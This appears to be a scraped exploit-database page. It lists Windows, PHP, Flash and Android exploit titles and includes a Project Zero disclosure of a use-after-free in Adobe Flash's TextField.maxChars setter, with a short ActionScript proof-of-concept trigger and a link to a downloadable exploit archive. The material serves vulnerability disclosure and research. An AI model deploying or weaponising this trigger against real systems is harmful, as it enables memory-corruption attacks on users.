6290e0021e
8 new exploits Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit (MS03-026) Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation Vulnerability (KiTrap0D) Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation Vulnerability (KiTrap0D) (MS10-015) PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit Windows Kernel - Bitmap Use-After-Free Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read Adobe Flash - URLStream.readObject Use-After-Free Adobe Flash - TextField.maxChars Use-After-Free Android - ih264d_process_intra_mb Memory Corruption Adobe Flash - Color.setTransform Use-After-Free PHP 5.5.33 - Invalid Memory Write
29 lines
804 B
Text
Executable file
29 lines
804 B
Text
Executable file
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581
|
|
|
|
There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:
|
|
|
|
var times = 0;
|
|
var mc = this.createEmptyMovieClip("mc", 101);
|
|
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
|
|
tf.maxChars = {valueOf : func};
|
|
|
|
function func(){
|
|
|
|
if (times == 0){
|
|
times++;
|
|
return 7;
|
|
}
|
|
mc.removeMovieClip();
|
|
|
|
// Fix heap here
|
|
|
|
return 7;
|
|
|
|
}
|
|
|
|
A sample swf and fla are attached.
|
|
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39650.zip
|
|
|